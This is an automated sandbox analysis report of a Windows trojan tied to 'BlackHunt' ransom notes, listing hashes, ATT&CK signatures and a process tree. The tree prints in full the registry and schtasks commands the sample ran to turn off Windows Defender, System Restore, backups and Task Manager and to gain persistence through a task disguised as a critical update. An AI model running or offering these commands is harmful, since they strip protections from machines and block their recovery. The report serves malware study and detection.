c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd

Analysis

max time kernel
201s
max time network
208s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
19/01/2024, 00:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe
Size

707KB
MD5

0610f09b43a7ad7d7a89481384ce7c4a
SHA1

3c8d349abd88170a9fd3ca720e27186c5d1c4ecc
SHA256

c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd
SHA512

4ae9eed164f9726f53ef5a8c0b0dabf3705d2dfe1c3f5563b41373744eb313e2f9756698ebe26dfd74e32e2579ca948f6520069ea39f7de3a44e4050f05f2f28
SSDEEP

6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1p8wvnh:6uaTmkZJ+naie5OTamgEoKxLWUuh

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta"	reg.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3520	schtasks.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.Hunt2	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Hunt2	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\	reg.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe
Token: SeRestorePrivilege	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe
Token: SeBackupPrivilege	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe
Token: SeTakeOwnershipPrivilege	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe
Token: SeAuditPrivilege	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe
Token: SeSecurityPrivilege	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe
Token: SeIncBasePriorityPrivilege	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1848 wrote to memory of 3520	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	91
PID 1848 wrote to memory of 3520	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	91
PID 1848 wrote to memory of 3112	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	93
PID 1848 wrote to memory of 3112	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	93
PID 1848 wrote to memory of 1176	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	95
PID 1848 wrote to memory of 1176	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	95
PID 1848 wrote to memory of 2508	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	97
PID 1848 wrote to memory of 2508	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	97
PID 1848 wrote to memory of 1660	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	99
PID 1848 wrote to memory of 1660	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	99
PID 1176 wrote to memory of 4232	1176	cmd.exe	103
PID 1176 wrote to memory of 4232	1176	cmd.exe	103
PID 1660 wrote to memory of 876	1660	cmd.exe	105
PID 1660 wrote to memory of 876	1660	cmd.exe	105
PID 3520 wrote to memory of 3900	3520	cmd.exe	104
PID 3520 wrote to memory of 3900	3520	cmd.exe	104
PID 3112 wrote to memory of 2444	3112	cmd.exe	106
PID 3112 wrote to memory of 2444	3112	cmd.exe	106
PID 2508 wrote to memory of 4916	2508	cmd.exe	102
PID 2508 wrote to memory of 4916	2508	cmd.exe	102
PID 1848 wrote to memory of 3288	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	107
PID 1848 wrote to memory of 3288	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	107
PID 1848 wrote to memory of 4896	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	109
PID 1848 wrote to memory of 4896	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	109
PID 1848 wrote to memory of 2020	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	111
PID 1848 wrote to memory of 2020	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	111
PID 1848 wrote to memory of 4076	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	113
PID 1848 wrote to memory of 4076	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	113
PID 1848 wrote to memory of 912	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	118
PID 1848 wrote to memory of 912	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	118
PID 4896 wrote to memory of 3616	4896	cmd.exe	117
PID 4896 wrote to memory of 3616	4896	cmd.exe	117
PID 3288 wrote to memory of 2452	3288	cmd.exe	115
PID 3288 wrote to memory of 2452	3288	cmd.exe	115
PID 1848 wrote to memory of 1636	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	119
PID 1848 wrote to memory of 1636	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	119
PID 1848 wrote to memory of 4656	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	121
PID 1848 wrote to memory of 4656	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	121
PID 4076 wrote to memory of 3492	4076	cmd.exe	123
PID 4076 wrote to memory of 3492	4076	cmd.exe	123
PID 2020 wrote to memory of 1448	2020	cmd.exe	125
PID 2020 wrote to memory of 1448	2020	cmd.exe	125
PID 1848 wrote to memory of 1368	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	124
PID 1848 wrote to memory of 1368	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	124
PID 1848 wrote to memory of 2940	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	130
PID 1848 wrote to memory of 2940	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	130
PID 1848 wrote to memory of 3780	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	127
PID 1848 wrote to memory of 3780	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	127
PID 1848 wrote to memory of 384	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	128
PID 1848 wrote to memory of 384	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	128
PID 1848 wrote to memory of 1376	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	133
PID 1848 wrote to memory of 1376	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	133
PID 1848 wrote to memory of 4476	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	134
PID 1848 wrote to memory of 4476	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	134
PID 1636 wrote to memory of 512	1636	cmd.exe	137
PID 1636 wrote to memory of 512	1636	cmd.exe	137
PID 1848 wrote to memory of 1352	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	138
PID 1848 wrote to memory of 1352	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	138
PID 1848 wrote to memory of 1500	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	140
PID 1848 wrote to memory of 1500	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	140
PID 1848 wrote to memory of 4104	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	145
PID 1848 wrote to memory of 4104	1848	c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe	145
PID 3780 wrote to memory of 2304	3780	cmd.exe	146
PID 3780 wrote to memory of 2304	3780	cmd.exe	146

C:\Users\Admin\AppData\Local\Temp\c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe
"C:\Users\Admin\AppData\Local\Temp\c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1848
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    3⤵
    - Modifies registry class
    PID:3900
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3112
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    3⤵
    - Modifies registry class
    PID:2444
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1176
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    3⤵
    - Modifies registry class
    PID:4232
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    3⤵
    - Modifies registry class
    PID:4916
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1660
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    3⤵
    - Adds Run key to start application
    PID:876
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3288
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:2452
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4896
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2020
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    3⤵
    PID:1448
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4076
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    3⤵
    PID:3492
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  2⤵
  PID:912
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    3⤵
    PID:1372
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    3⤵
    PID:512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  2⤵
  PID:4656
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    3⤵
    PID:1640
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  2⤵
  PID:1368
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    3⤵
    PID:2472
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3780
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    3⤵
    PID:2304
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  2⤵
  PID:384
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    3⤵
    PID:3312
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  2⤵
  PID:2940
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    3⤵
    PID:736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
  2⤵
  PID:1376
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
    3⤵
    PID:180
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  2⤵
  PID:4476
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    3⤵
    PID:440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
  2⤵
  PID:1352
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
    3⤵
    PID:2720
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  2⤵
  PID:1500
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    3⤵
    PID:5000
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
  2⤵
  PID:4104
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
    3⤵
    PID:3440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
  2⤵
  PID:4776
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
    3⤵
    PID:4080
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
  2⤵
  PID:2912
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
    3⤵
    PID:3180
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
  2⤵
  PID:3376
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
    3⤵
    PID:1632
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
  2⤵
  PID:3768
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
    3⤵
    PID:4928
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
  2⤵
  PID:5080
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
    3⤵
    PID:2864
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
  2⤵
  PID:4008
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
    3⤵
    PID:2704
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  2⤵
  PID:4460
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
    3⤵
    PID:4572
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
  2⤵
  PID:2812
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
    3⤵
    PID:116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe" /F
  2⤵
  PID:4760
- - C:\Windows\system32\schtasks.exe
    SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\c475246eda16d4813b9558f4d6d32388a8e5d6b27dc3d53020a18654b5467edd.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:3520